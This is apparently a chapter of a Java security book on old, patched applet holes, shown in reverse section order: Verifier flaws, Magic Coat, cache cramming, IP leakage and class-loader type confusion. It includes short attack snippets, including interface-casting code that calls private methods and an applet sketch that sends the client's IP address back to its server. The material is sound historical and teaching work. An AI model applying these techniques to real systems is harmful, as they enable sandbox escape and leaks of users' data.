Section 16 -- Verifying the Verifier As Chapter 2 describes, one of the essential pieces of the Java security model is the Verifier, which is responsible for checking the integrity of a class file and its byte code. Each VM, including the VM in your browser, has its own version of the Verifier. Thus the Verifier acts as a kind of independent verification mechanism to double-check the integrity of mobile Java that arrives from unknown parts. The University of Washington's Kimera Project, led by Professor Brian Bershad, implemented a cleanroom Verifier as part of a larger mobile code architecture experiment. The main idea behind the Kimera Project is to centralize Verification of byte code instead of having a Verifier running on each client. Their aims in creating a Verifier were to make it small, simple, and able to work independently. The discussion here is distilled from extensive Kimera Web documentation, which can be found at kimera.cs.washington.edu. After creating their Verifier, the Kimera Project team wanted to test it to make sure it performed in a secure and robust manner. The question was, how to do this? The answer to that question led to an empirical demonstration that the Kimera Verifier was safer than many commercial Verifiers then in widespread use. Most commercial Verifiers perform security checks in a series of stages that are distributed throughout the VM architecture. In particular, Chapter 2 describes how verification is traditionally broken into static and runtime processes. By contrast, the Kimera Verifier packages a complete verification system as one single component. An added bonus to the Kimera Verifier is the inclusion of a number of safety axioms distilled by the Kimera Project from the Java VM specification. This has the advantage of allowing the Kimera Verifier to be checked for correctness in a more thorough manner than the code for commercial Verifiers. The Kimera Verifier aligns closely with class file verification as described in the VM specification. That
means the process of verification is logically divided into four stages (see Chapter 2 for more on these stages):
● Verification of class file consistency and structural soundness
● Verification of instruction boundaries and safety of branches
● Data flow analysis that verifies that operands preserve type-safety rules
● Verification that the class, along with the rest of the VM, does not break global type-safety rules or interface restrictions
In order to test their Verifier, the Kimera Project team created a mutation testing system. The end product of the approach is a test suite that includes millions of tests. The tests, millions of legal and illegal byte code patterns, were created by applying a set of simple mutation rules to a small number of primitive test cases. Without access to an oracle (the lack of which is the traditional Achilles' Heel of testing), there is no way to say whether behavior of the Verifier on any given test is correct or incorrect. One way around this is to submit the tests to a number of different Verifiers and see what happens. According to this paradigm, whenever results from a number of distinct Verifiers disagree, further investigation into the cause of the disagreement is warranted. The obvious problem with this approach is that if all Verifiers perform equally incorrectly on a test case, nothing suspicious will be observed, and all Verifiers will be incorrectly thought to have done the right thing. Regardless of that serious flaw, the Kimera test suite was able to identify a large number of errors in commercial Verifiers, which led to correction of the Kimera Verifier throughout its testing. The Kimera testing paradigm has much in common with N-version programming, in which N distinct versions of a piece of software are run simultaneously and a vote determines the final result. (For more on N-version programming see [Voas and McGraw, 1998].) We believe Kimera's testing methodology is a glimpse at the future of testing. Given the vast computational resources of today, there is no reason not to automate testing to a much greater extent than was feasible just a few years ago. Traditional metrics, such as test coverage, can be used to gauge the efficacy of such automated testing.
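The core of the approach can be sketched in a few lines. The code below is our own hedged reconstruction of the idea, not Kimera code; the Verifier interface and the single-byte mutation strategy are assumptions made for illustration.

import java.util.Random;

// Hypothetical sketch of the mutate-and-compare approach described above:
// flip one byte of a valid class file and ask several independent verifiers
// whether the mutant is still acceptable. Disagreement flags a test case
// worth investigating by hand.
interface Verifier {                 // assumed interface, one per implementation
    boolean accepts(byte[] classFile);
}

public class DifferentialVerifierTest {
    public static void test(byte[] validClass, Verifier[] verifiers, int trials) {
        Random rng = new Random();
        for (int t = 0; t < trials; t++) {
            byte[] mutant = (byte[]) validClass.clone();
            int pos = rng.nextInt(mutant.length);        // mutate a single byte
            mutant[pos] ^= (byte) (1 << rng.nextInt(8));

            boolean first = verifiers[0].accepts(mutant);
            for (int v = 1; v < verifiers.length; v++) {
                if (verifiers[v].accepts(mutant) != first) {
                    System.out.println("Disagreement on mutant at byte " + pos);
                    break;
                }
            }
        }
    }
}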
Flaws in the Verifier In April of 1997, the Kimera Project announced the discovery of 24 flaws in Sun's Verifier implementations and 17 flaws in Microsoft's Internet Explorer. Because Netscape's Verifier is very closely based on the one in Sun's JDK, it is safe to assume that most of the 24 flaws in Sun's Verifier exist in Netscape's as well (in fact, testing confirmed this). As we detail next, the flaws can be divided into several categories: security holes, weaknesses, and ambiguities.
Flaws in Sun's JDK The Sun flaws were found in the Verifiers included in JDK 1.0.2 and JDK 1.1.1. JDK 1.1.1 contained only
15 of the 24 total flaws. One of the flaws was serious enough to warrant an immediate patch to the JDK. We describe it now. The most serious flaw was a type-safety error that allowed a number to be converted into a pointer to any object in the VM. An attack applet based on this flaw could gain access to privileged information or otherwise force an illegal operation. As we describe in Chapter 2, type-confusion errors of the sort that this bug could lead to can be used to circumvent Java's security mechanisms entirely. This flaw allowed applets to assign a long or a double into an object reference, which can in turn be used to forge pointers inside the VM. Both JDK 1.0.2 and Netscape's Navigator Gold 3.01 included this bug. Five other type-safety problems were also discovered in Sun's Verifier. One of these errors prompted Sun's security patch. This flaw, which existed in JDK 1.1.1 and JDK 1.0.2, involved the fact that a method can declare its maximum number of locals to be N, but take M arguments in its signature, where M can be greater than N. A description of the type-safety problems can be found at kimera.cs.washington.edu/flaws/sunflaws0423.html. Besides the type-safety flaws, 11 access-flag flaws were identified. One example of such a flaw found in JDK 1.1.1 and JDK 1.0.2 is a flaw in which access flags for some methods are unrestricted. A properly constructed attack might be able to affect type safety and lead to a type-confusion attack. Once again, more information is available on the Kimera Web site. Finally, seven flaws can be classified as instruction or class file validity problems. The most serious of these flaws, found in JDK 1.0.2, was a problem whereby the class namespace management system could become confused by malformed classnames.
Flaws in Microsoft Internet Explorer The Kimera Project's testing methodology uncovered 17 flaws in Internet Explorer versions 4.0 and 3.02. Microsoft released a patch to address some of the more serious problems. Ten of the flaws that applied to the MSIE Verifier also occurred in Sun's Verifier. The most serious flaw was the same flaw discovered in the JDK implementation: the ability to assign a long or a double into an object reference. This flaw prompted the security patch. A list briefly explaining all of the flaws can be found at kimera.cs.washington.edu/flaws/msflaws0423.html.
The Reaction One of the most interesting things about the Verifier bugs discovered by the Kimera group was the way in which the news broke in the press. Somehow, Sun was able to stage a preemptive PR strike before the Kimera announcement was even made. Their version of the story, which was later changed to more closely align with reality, was covered in the Wall Street Journal. In particular, the Sun announcement focused on only one of the many bugs.
The importance of type safety to the Java security model was also reemphasized by the Kimera Project findings. Sun claimed that many problems in the type system might lead to a denial-of-service attack through a crash, but did not acknowledge that it is often trivial to turn these crashes into more insidious type-confusion attacks. The next Java security hole, also discovered by the Kimera Project, served to bring that point home.
Attack Applets: Exploiting Holes in the Security Model
Section 15 -- The Magic Coat Chapter 3 serves to emphasize that code signing is complicated. As in the original sandbox model, there is plenty of room for error in designing and implementing a code-signing system. The Magic Coat hole was a fairly straightforward problem in the implementation of Java's Class class and was quickly explained on both the Princeton Web site (www.cs.princeton.edu/sip) and JavaSoft's security site (java.sun.com/sfaq). The problem was that the method Class.getSigners() returned a mutable array of all principals that signed a particular class. It was possible for an applet to modify the array, label itself as signed by a trusted principal, and thus gain whatever privileges it wanted. The applet didn't even have to guess which principals were trusted: the system helpfully gave it a list of all known principals, and the applet could "try on" the known identities one by one until it found a highly privileged one. The fix was as simple as returning only a copy of the array and not the array itself. Consider a situation in which Alice has been granted no security privilege on a Web user's system. In fact, contrary to what the original JavaSoft statement about the bug claimed, Alice can be completely unknown to the system. In other words, code signed by Alice is not trusted any more than the usual applet off the street. If the Web user (using the HotJava browser, which at the time was the only commercial product that supported JDK 1.1.1) loads an applet signed by Alice, that applet can step out of the sandbox by exploiting the hole. The fact that the system need not have Alice's public key in its database is important. It means that Alice can be any arbitrary attacker who knows how to sign an applet with a completely random identity. Creating such an identity is easy, as is signing an applet with that identity. This makes the hole very serious indeed. The hole allows Alice's attack applet to change the system's idea of who signed it. This is especially bad if Alice is not granted privilege to run outside the sandbox, but Bob is. Alice's applet can exploit the hole to
change its level of permission to include all of Bob's privilege. Alice's applet can get the maximum amount of available privilege doled out to any signer known to the system. If you liken the signature/privilege identities to coats in a closet, Alice's attack applet can try on each coat and attempt various disallowed things until it discovers which of the coats are "magic" and allow it to gain privilege. If a magic coat is discovered, Alice's applet can step out of the sandbox and do things it should not be allowed to do. Trying on coats is as simple as attempting a disallowed call and watching to see what happens. In brief, by exploiting this hole, the Magic Coat attack applet can get a list of all signers known to the local system, determine which if any of those signers is trusted, and then relabel itself so it appears to have been signed by a trusted signer. The result is that the applet can completely evade Java's security mechanisms. JavaSoft fixed the flaw in release 1.1.2 of the JDK. Soon after discovery of the hole, a patch was created and sent to the various Java licensees. Since neither Netscape nor Microsoft supported JDK 1.1 code signing when the hole was discovered, they were not vulnerable. In fact, as Chapter 3 discusses, both Netscape Communicator and MSIE have different models of code signing than Sun does.
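The fix mentioned above, returning a copy of the signers array rather than the array itself, is ordinary defensive copying. The sketch below is our own illustration of that idiom, not JavaSoft's patch; the class and field names are invented.

// Hypothetical sketch of the defensive-copying fix described above: hand
// callers a copy of the signer list so they cannot rewrite the VM's own copy.
public class SignerHolder {
    private Object[] signers;   // stand-in for the identities that signed a class

    // Wrong: returning the internal array lets an applet modify it in place.
    public Object[] getSignersUnsafe() {
        return signers;
    }

    // Right: return a copy; changes made by the caller stay with the caller.
    public Object[] getSigners() {
        Object[] copy = new Object[signers.length];
        System.arraycopy(signers, 0, copy, 0, signers.length);
        return copy;
    }
}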
Assessing the Bug JavaSoft states correctly that this bug "represents minimal exposure to users" since it affects neither of the popular browsers. It is important to note that HotJava is completely susceptible to this problem unless code signing is entirely disabled. HotJava has always been suspect from a security perspective, and the Magic Coat hole shows why. So was this bug serious? Yes. It provides yet another example of how complicated systems can break down in unexpected ways. Dr. Peter Neumann, moderator of comp.risks and noted security expert said at the time, "This is another instance of an old RISKS story-a surprisingly large portion of the entire infrastructure must be trustworthy, including pieces you might not have realized were critical. That statement is perhaps best thought of as a corollary to Leslie Lamport's classic statement, 'A distributed system is one in which the failure of a computer you didn't even know existed can render your own computer unusable.'"
Attack Applets: Exploiting Holes in the Security Model
Section 14 -- Virtual Voodoo In March 1997, Sun announced the discovery and eradication of a bug in the Verifier of the JDK. The bug was present in all Java VMs, and Sun shipped a patch to Java licensees. Sun claimed that the bug was discovered by the engineering team during a standard security audit and was fixed within 24 hours of discovery. No attack based on this bug was ever devised. In fact, very little information about the fix was disseminated publicly. Statements made by Sun to the press emphasized the complexity of an exploit. Realistically, it sounds like the problem was similar to the You're Not My Type problem-an attacker would need to create malicious byte code to exploit the problem.
Preemptive Strike? We found it a bit peculiar that Sun announced the discovery of a flaw in the Verifier and the dissemination of a patch to vendors. We speculate that someone outside of Sun had discovered the problem and Sun decided to announce the flaw before the discoverer did.
Attack Applets: Exploiting Holes in the Security Model
Section 13 -- Cache Cramming The second of the two attacks discovered by Major Malfunction and Ben Laurie in February 1997 works against Microsoft's Internet Explorer browser, but not Netscape. Unlike the minor Steal This IP Address problem, this problem is much more disturbing. On their Web page, www.alcrypto.co.uk/java/, Major Malfunction and Ben Laurie claim "this loophole allows an attacker to connect to any TCP/IP port on the client's machine." That's a bit of an overstatement, but interesting information about listening ports can be gathered (for possible later use), which may leave a firewalled host more susceptible to standard TCP/IP-based attacks. And that's bad news. The Java Security Manager usually disallows port-scanning behavior, but the crackers use the well-known trick of sticking some Java code (in this case, a port scanner) in the browser's cache and later executing it through a file: URL (using frames in the usual way). This attack works because Microsoft's cache layout is transparent. This is an interesting variation on the Slash and Burn attack described on page 153. The attackers cheat a bit for demonstration purposes by having the patsy clear his or her cache, but even without this exercise, guessing the cache location (one of four possibilities) would not be all that much of a challenge. Contrary to their claim, however, Java security rules are no longer relaxed for code loaded out of the cache (unless the cache happens to be in the CLASSPATH, which is not recommended). That problem was fixed in the upgrade to JDK 1.0.2. (Yet another reason that the Slash and Burn attack is obsolete.) In any case, Microsoft apparently places HTML and class files in the same directory stored with their original names (remember, a Java class will only run if it is correctly named). Although MSIE can't browse cache files directly, HTML pages can reference cache files by explicit name. Thus, the file: URL, if properly constructed, can invoke the Java class.
The applet stuffed in your cache is a port scanner. The port-scanning attack works because an applet is allowed to open a socket connection back to where it came from. And guess where it came from: Yep, the client machine. So a port scan is carried out by their cache-bomb applet. Unlike the Steal This IP Address problem, port scanning is very serious. Using this attack, a cracker might be able to discover things like weak sendmails listening on port 25, leaving only the problem of getting the port-scan information back to the cracker site. Accomplished crackers can simply use the URL-lookup covert channel to do this. Unfortunately, this approach is only one of many ways of sending interesting tidbits out from an applet.
Resolution The information released by Major Malfunction and Ben Laurie prompted Microsoft to release a patch to solve the problem.
Attack Applets: Exploiting Holes in the Security Model
Section 12 -- Steal This IP Number In a February 1997 post to comp.lang.java.security and Bugtraq, two British consultant/hackers, Major Malfunction (probably not his real name) and Ben Laurie, followed through with their decision to inform the unsuspecting of a couple of new Java-based attacks. Although the pair (and assorted friends) had actually used Java to hack their way through firewalls a month earlier, they thought it only fair to provide Netscape and Microsoft with ample time to address the problems before they went public. The most interesting thing about the two attacks was the fact that one of them (which we call the Steal This IP Number attack) was found only in Netscape, and the other (which we call Cache Cramming) was found only in Internet Explorer. This is interesting because it emphasizes the fact that there are multiple Java implementations, and they are not always equivalent. To be sure, they are all supposed to follow the same specification, but there are many ways to do so. As a result, Netscape's model (which is very close to the JDK implementation) and Microsoft's model differ significantly. This implies that as Java implementations diverge, holes related to implementations will not be cross-platform. It also implies that some implementations will be more secure than others. It is stretching a bit to call the first problem a Java security hole, but because of the way the hole was treated by the community we decided to include a description here anyway. The Steal This IP Address hole, which exists in both Navigator 3.x and 4.0, allows a miscreant to gain access to information from the client machine that would normally be considered secure. The attack works as advertised on the Java/MSIE/Netscape Cache Exploit page (see www.alcrypto.co.uk/java/), but there is really nothing new to this discovery. On their page, Major Malfunction and Ben Laurie say: All we can do is log the real identity of a client machine, despite most precautions they might take to prevent us from doing so . . . Devices such as firewalls, proxies, SOCKS hosts,
etc., all succumb easily to the call of the Java siren . . . Even the mighty anonymizer retires after the first round, nose bleeding and ego bruised. To complete this recipe, we take one call to InetAddress.getLocalHost(), mix it with a call to AppletContext.showDocument() . . . And there you have it. Because the applet is running on the client machine and it is allowed to call InetAddress.getLocalHost(), it can find out the client machine's IP. Although this may surprise some users (especially those using the anonymizer, a proxy meant to protect client browser identities from snooping Web servers), the ferreting out of this information is not really a dangerous new invasion of privacy. The Web is not a private place, and this demonstration only serves to bring that point home. Your browser is probably a blabbermouth. It is a clever move to use Java to look up an IP at the client end through several proxy layers, but not all that clever.
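For concreteness, here is our own minimal sketch of the recipe quoted above. It is not the authors' demonstration code; the report path and frame name are invented, and on a patched VM getLocalHost() reports only the loopback address, as noted below.

import java.applet.Applet;
import java.net.InetAddress;
import java.net.URL;

// Hypothetical sketch of the "recipe" quoted above. On a patched VM,
// getLocalHost() returns only the loopback address, so nothing useful leaks.
public class WhoAmI extends Applet {
    public void start() {
        try {
            String ip = InetAddress.getLocalHost().getHostAddress();
            // Ship the address home by asking the browser to fetch a URL
            // (relative to the applet's own server) that encodes it.
            URL report = new URL(getDocumentBase(), "log?client=" + ip);
            getAppletContext().showDocument(report, "hidden_frame");
        } catch (Exception e) {
            // lookup refused or malformed URL; the demonstration simply stops
        }
    }
}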
Déjà Vu All Over Again The flaw that appeared in the Netscape browser was actually a flaw that had been discovered and fixed internally by JavaSoft some 10 months before it reappeared. In Sun's JDK 1.0.2 reference implementation of java.net, an applet that calls getLocalHost() does not get a true hostname/IP address; instead, it gets the loopback host ("localhost/127.0.0.1"). For some reason, the change made to fix the privacy hole was not incorporated into Netscape. The fix was exceptionally easy.
Attack Applets: Exploiting Holes in the Security Model CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Previous Page
Section 11 -- Big Attacks Come in Small Packages
We now describe an attack applet that exploits a Java security weakness in beta versions of Microsoft's Internet Explorer 3.0. The weakness allows code in an untrusted applet to pass itself off as part of a Java package. This flaw allows an attacker to gain full access to the victim's files and to the network. Understanding this flaw requires a more detailed explanation of Java packages.
Java Packages

The Java language supports the concept of packages: groups of Java classes meant to be used together. Packages have names like java.lang and EDU.princeton.cs.sip. Every Java class belongs to some package.

Packages serve two purposes. First, since the full name of a class is the package name followed by the classname, they provide a way for different people to name their classes without accidental name collisions. For example, if we put all of our classes into the authors package and you put all of your classes into the readers package, then our classnames cannot collide with yours.

The second purpose of packages is to restrict access to certain Java variables. When declaring a variable, a programmer states which classes are allowed to access it. If the variable is declared private, it is accessible only by the class that created it. If a variable is declared protected, it is accessible only by the creating class and its subclasses. If a variable is declared public, it is accessible by all classes. If a variable is declared neither private, protected, nor public, then it is accessible only by classes in the creating class's package.

Some packages limit their membership to built-in browser classes only. Membership is restricted by having the Virtual Machine ask the Security Manager to pass judgment on every request to join a package. The Security Manager enforces the restriction by prohibiting classes loaded across the Net from joining restricted packages. (For more information on this topic, see Chapter 2.)
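As a concrete (and entirely made-up) illustration of the four access levels just described:

// Hypothetical example; the package name and the fields are invented.
package authors;

public class Manuscript {
    private   int draftCount;    // accessible only inside Manuscript
    protected int revision;      // accessible to Manuscript and its subclasses
    public    int pageCount;     // accessible to all classes
              int royaltyRate;   // no modifier: accessible only within package authors
}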
What Went Wrong

In Microsoft's browser, there was an error in the way the Security Manager made its decisions about package membership. Because of the bug, the Security Manager incorrectly used only the first component of the package name to check access permission. This method failed for packages whose names started with com.ms. Interestingly, several of Microsoft's built-in packages started this way. (This is interesting because the domain name ms.com belongs to Morgan Stanley, not to Microsoft. The package should have been called com.microsoft, although this change would not have prevented the bug.)

The result was that untrusted applet code could join a sensitive package, and gain access to any variables in that package that were accessible package-wide. These variables included, among other things, the Security Manager's list of files to which the applet had access. A mischievous applet could access any file on the system by changing the Security Manager's list to include the desired file.
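To make the mechanics concrete, here is a hypothetical sketch (the package name below is invented and stands in for a real restricted Microsoft package) of how an applet class could have declared its way into a restricted package under the buggy check:

// Hypothetical sketch only. Under the broken check described above, which
// examined just the first name component ("com"), a class like this would
// have been admitted to a restricted com.ms.* package. Once inside, it could
// read or rewrite any fields in the package that had package-wide access.
package com.ms.somethingsensitive;   // invented name

public class Gatecrasher {
    // ... code that tampers with package-accessible security state ...
}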
The Reaction

This flaw was found just before Microsoft was to ship the first nonbeta version of their Internet Explorer 3.0 browser. Since the ship date had been announced (and a big public release hoopla was planned), the ship date could not be moved. Since the product had a serious security flaw, shipping it was not an acceptable alternative. Microsoft's development team launched a heroic effort to fix the bug, test the solution, and restart the product release cycle in time to meet the original release deadline. They succeeded.

The Big Attacks Come in Small Packages bug was the last major flaw found in the JDK 1.0.2 security model implementations. Following discovery of this attack applet, several months went by before JDK 1.1 was released. As we discussed earlier, the period of six months without a major security hole was of long enough duration to convince some people (in particular, Java's most ardent supporters) to declare that all holes had been discovered and that Java had been rendered secure through a series of patches. In fact, the previous version of this book was waved around as a prime example of antiquated old news that no longer applied.
Even if another hole is never discovered in Java (unlikely, but why not dream big?), the information contained in this chapter is important to people charged with designing, managing, and using software in a security-critical situation. We would all do well to learn from our mistakes, as history tends to repeat itself.
Section 10 -- Tag-Team Applets

The next group of attacks combines the two previous attack methods. By setting up two separate naming environments and passing objects between them, this new group of attacks causes type confusion, leading to security breaches. These attacks are launched by putting two applets on a Web page and having the two applets cooperate. Typically, both applets would be written by the same programmer, and located on the same Web server. To better understand this threat, the next section will examine in further detail how Java manages namespaces. (See also Chapter 2.)
What's in a Name?

In a Java-enabled browser, several applets might be running at the same time. Since each applet contains several classes, each with a distinct name, there's a danger that two applets might accidentally use the same name. To prevent this, the Java designers decreed there should be a separate namespace for each applet; that is, each applet should have its own view of which names correspond to which classes.

Despite the fact that each applet has its own namespace, there are ways for two applets to pass objects back and forth among themselves. One such channel involves public variables in the Java runtime. Another channel is through manipulating threads. The result is that an applet can potentially have an object whose name is defined in another namespace. Things can get tricky when this happens.

For example, suppose that the AncientGreek applet and the Simpsons applet are running at the same time. Each of the two applets has defined a class called Homer, but they have very different ideas of how Homer should behave. Worse yet, imagine that the two applets communicate, and the AncientGreek applet ends up with a Homer Simpson object. If the AncientGreek applet asks the object what its class is, the object responds, Homer. The AncientGreek applet then asks Homer to recite an epic poem. Depending on your point of view, the result would be either tragic or comical. In any case, it wouldn't be what the programmers wanted.

This isn't really a security risk; however, it becomes one if the Java system itself gets confused. The danger is that the system will decide that two unlike types are really the same, when all that is the same is their names. This sort of mix-up would constitute type confusion, and the applet could break the Java type system, leading to a security breach. One way that an applet could do this is by engaging in type punning. The applet would set up two types with the same name, create an object of one type, and then use it as though it were an object of the other type. For example, suppose that this is a Java type:

class Secure {
    private Object secretData;
}
Another applet could create another type with the same name:

class Secure {                // impostor
    public Object secretData;
}
Now if the applet could get an object of the real Secure class and convince Java that the object belonged to the impostor Secure class, Java would allow the applet to access the supposedly private secretData field. As far as Java is concerned, this would be fine. The impostor secretData field is public. The applet would have accessed data it was not supposed to see. Type punning works for method calls, too. If the secretData field were replaced with a dangerousOperation method, then an applet that could do type punning could call the dangerousOperation method even though it was supposed to be private. In summary, if type punning is possible, Java's security collapses. Java prevents type punning by being very careful when deciding whether two classes are the same. Rather than using the classname to make this decision, Java considers two classes the same only if they have the same name and were defined in the same namespace (that is, by the same Class Loader). That is sufficient protection to avoid type punning.
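The rule can be seen directly with a pair of class loaders. The sketch below is our own illustration (the class name Secure and the file URL are made up, and it uses the URLClassLoader that appeared in later JDKs): the same byte code loaded through two different loaders yields two classes that are not interchangeable, even though their names match.

import java.net.URL;
import java.net.URLClassLoader;

// Hypothetical demonstration: the same .class file, loaded by two different
// class loaders, produces two distinct classes despite the identical name.
public class TwoLoaders {
    public static void main(String[] args) throws Exception {
        URL[] path = { new URL("file:/tmp/classes/") };       // made-up location of Secure.class
        ClassLoader first  = new URLClassLoader(path, null);  // null parent: no delegation
        ClassLoader second = new URLClassLoader(path, null);

        Class a = first.loadClass("Secure");
        Class b = second.loadClass("Secure");

        System.out.println(a == b);                           // false: different namespaces
        System.out.println(b.isInstance(a.newInstance()));    // false: not the "same" type
    }
}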
What Went Wrong: A Name Alone

Unfortunately, the creators of Java were not always so careful. In Java 1.0.2, Netscape 2.02, and the first beta version of Internet Explorer, the types of interfaces and exceptions were compared by name rather than by the (name, namespace) pair as required. This led to a set of attacks that could break Java's security system, achieving full system penetration.

The attacks worked as described earlier. The attacker wrote two applets defining different classes with the same name C. One applet would create an object of its class C and pass it to the other applet, which would operate on the object as if it were an instance of its own, different class C. This leads to a classic type-confusion situation, which can be exploited by methods seen several times in this chapter.
Section 9 -- Casting Caution to the Wind

Software consultant Tom Cargill has discovered two security flaws related to the way in which Java handles interface types. Both flaws involve a rare case in which Java fails to check whether a method is private. Both also use type-casting operations on Java's interface types. By exploiting these flaws, an attacker can call private methods normally prohibited by Java's security rules. Since some of the security-critical values inside the Java system are protected by private methods, a complete security breach using this attack is possible.
Simple Interface Casting

The core of Cargill's first discovery is shown in the following code:

interface Inter { void f(); }

class Secure implements Inter {
    private void f();
}

class Dummy extends Secure implements Inter {
    public void f();

    Dummy() {
        Secure s = new Secure();
        Inter i = (Inter) s;
        i.f();    // should be illegal
    }
}
This code allows the private f method of class Secure to be called illegally. The Java interpreter fails to determine if f is private when i.f() is called. The Princeton team figured out how to use this flaw to achieve full system penetration. This was done by exploiting the fix to the class loader bug. The class loader bug was fixed by splitting the critical defineClass method into a private method and a public method. The private method, defineClass0, did the work. The public method checked the initialized flag and called defineClass0 only if the flag was true. Since the private defineClass0 method couldn't be called directly by an applet, this was supposed to fix the class loader bug. Unfortunately, a variant of the interface-casting trick shown here allows an applet to call the private defineClass0 method directly, bypassing the check. This meant that the attack could create a class loader by exploiting the Verifier bug. The initialized flag would be false, but that wouldn't matter. A programmer could bypass the flag-check by exploiting the interface-casting trick to call the private defineClass0 method directly. By using this trick, an attacker could gain full system penetration under Netscape Navigator 2.02.
The Full Fix

Netscape fixed this problem in two ways. First, it fixed the flaw in its Java Virtual Machine that allowed the interface-casting trick to work. Second, Netscape began storing and checking the initialized flag inside the Java Virtual Machine, rather than in programmer-generated Java code. Netscape eliminated the dangerous defineClass0 operation by integrating everything into the VM's implementation of defineClass. This change took effect in Navigator 3.0beta3.

In reaction to the interface-casting bug, Netscape changed its Java implementation to protect itself more generally against an attacker who had the ability to call private methods. By going beyond a simple bug fix to improve the structure of the system, Netscape practiced good security engineering. Its decision paid off when the next bug was discovered.
Advanced Interface Casting

Here is the core of Cargill's second discovery:
interface Inter { void f(); }

class Secure implements Inter {
    private void f();
}

class Dummy implements Inter {
    public void f();

    static void attack() {
        Inter[] inter = { new Dummy(), new Secure() };
        for (int j = 0; j < 2; ++j)
            inter[j].f();
    }
}
The first call, inter[0].f(), is legal since Dummy's f method is public. The next time around the loop, inter[1].f() is illegal since Secure's f method is private. In this case, Java was too smart for its own good. In order to improve performance, it only checked for legality the first time through the loop. Theoretically, what was legal the first time would be legal the next time. (See Chapter 2.) Though this is often a correct assumption, it broke down for the code just shown. This trick allows an attacker to call private methods in violation of Java's security rules. Had Netscape not improved the structure of their system after the previous bug was reported, this bug would have once again allowed the class-loader attack to work. However, because Netscape had protected their system against private method attacks, this flaw was not easy to exploit.
Section 8 -- Applets Running Wild

The next security problem is the Princeton class-loader attack. This was the most widely publicized of all Java security breaches. The problem was caused by mistakes in the way the Java system integrated separate pieces of code. By corrupting this integration or linking process, an attacker could break through Java's security and do anything at all. To help better understand this issue, the following section looks more closely at how Java manages the dynamic-linking process.
Linking

A Java program is composed of several separate pieces called classes. Each class is stored in a separate file, and the Java system uses a just-in-time strategy to load each class only when it is first needed. Just-in-time loading allows Java applets to start running quickly, without waiting for the entire applet to be pulled across the Net. It does have one drawback, however: A running applet is usually incomplete. When an applet is built from several code pieces, the system has to be clever enough to make sure that the right pieces are attached in the right places.

A Java class file contains a series of instructions telling the Java system how the class should behave. The instructions sometimes reference other classes by name. Since classes are stored separately, the Java system translates each name into the identity of another class. This may involve loading the mentioned class across the Net. The core Java system does not do this translation itself, but outsources it to Java objects called Class Loaders. Outsourcing in this way allows programmers to create their own class loaders, extending Java's linking mechanism.
The interaction between a Class Loader and the core elements of Java is simple. When Java needs to determine which class corresponds to which name, the following steps are followed:

1. Java calls the Class Loader's loadClass method, passing it the name to look up.
2. The Class Loader consults its internal dictionary (which can include a list of built-in classes) to see whether a class with that name already exists. If one exists, that class is returned.
3. If the Class Loader does not have a class with the requested name, it tries to find one. Usually, it does this by fetching the byte code for the class across the Net.
4. After getting the byte code for the class, the Class Loader calls a special method called defineClass to turn the byte code into a usable class.
5. When defineClass is finished, the Class Loader returns the resulting class to Java.

The Class Loader's loadClass method thus returns the class that corresponds to the name being looked up. There are usually several class loaders in operation. When Java needs to translate a name, it asks the Class Loader that originally loaded the class referencing the name. Thus, each Class Loader is responsible for maintaining and defining its own part of the namespace.
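To make the protocol concrete, here is a skeletal class loader. It is a sketch only, not the browser's actual AppletClassLoader: it does not delegate to any parent loader, and it leaves the byte-code fetching unimplemented.

import java.util.Hashtable;

// A skeletal class loader following the five steps just described.
public class SimpleClassLoader extends ClassLoader {
    private Hashtable loaded = new Hashtable();            // step 2: internal dictionary

    public synchronized Class loadClass(String name, boolean resolve)
            throws ClassNotFoundException {
        Class c = (Class) loaded.get(name);                // step 2: already known?
        if (c == null) {
            byte[] code = fetchByteCode(name);             // step 3: find the byte code
            c = defineClass(name, code, 0, code.length);   // step 4: turn bytes into a class
            loaded.put(name, c);
        }
        if (resolve) {
            resolveClass(c);
        }
        return c;                                          // step 5: hand the class back
    }

    // Step 3 in practice means fetching <name>.class across the Net or from
    // disk. The body is omitted here; this sketch simply signals failure.
    private byte[] fetchByteCode(String name) throws ClassNotFoundException {
        throw new ClassNotFoundException(name);
    }
}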
Linking and Record-Keeping

Because Java has separate namespaces into which classes can be loaded, it can't simply have a unified "phone directory" tracking which class corresponds to which classname. Instead, the Java Virtual Machine maintains a separate directory for each class. These independent directories keep track of the names needed by each class. For example, if class A has a reference to a class called B, the directory for A will have an entry for B that points to the actual class the name represents. Figure 5.5 shows a more complicated example with four classes referencing each other. A big applet could consist of more than four classes, but the idea is the same: The applet is a set of classes that reference each other.
Figure 5.5 Four classes linked together. Each box represents a class. The circled name at the top of each box is the name of the class, and the entries underneath show how the class's namespace is defined.
Attack of the Evil Class Loaders

The example described in Figure 5.5 shows reasonable, self-consistent namespaces. The Princeton team discovered that a hostile class loader was capable of setting up a twisted namespace in which different classes had different views of the Java environment. Such inconsistencies can be exploited to create type confusion. A hostile class loader could launch a system-penetration attack. Figure 5.6 shows an example of what an evil class loader can do. The figure shows two classes, A and B, each of which refers to a classname "C". However, the two classes have different ideas of what the name "C" means. Class A points to the class we've labeled C1, while B points to C2.
Figure 5.6 An inconsistent namespace, created by a hostile class loader. Classes A and B have different ideas about what C refers to. This can sometimes be used to confuse the Class Loader.
Suppose that the Java code in class A allocates an object of type "C" and then passes that object to class B. The Java byte code Verifier thinks everything is okay, since an object whose class was named "C" is being passed into code that is expecting an object whose classname is "C". The Verifier allows the operation to proceed. But when class B accesses the object named "C", the true type will be C1, not the C2 that the Verifier approved. An object of type C1 is being treated as though it were of class C2. This is type confusion. When this attack is carried out, the evil class loader is asked twice to say which class corresponds to the name "C". It gives back different answers: C1 for class A, and C2 for class B.
Taking Exception

The class-loader attack should have been impossible. Java's security rules prohibit applets from creating class loaders. Unfortunately, the Princeton team discovered a flaw in the byte code Verifier that allowed this rule to be violated. Nothing stops an applet from declaring a new class that is a subclass of the ClassLoader superclass. It is up to the Security Manager to stop the actual construction from occurring. In this case, the Security Manager check is bypassed because of a bug. Read on for the gory details.

The rule against making class loaders is enforced by the object-oriented nature of Java. Every Java class extends its superclass. Each class can be thought of as being a specialized version of its superclass.3 Every class has one or more constructor functions, which properly initialize new objects. Java requires each
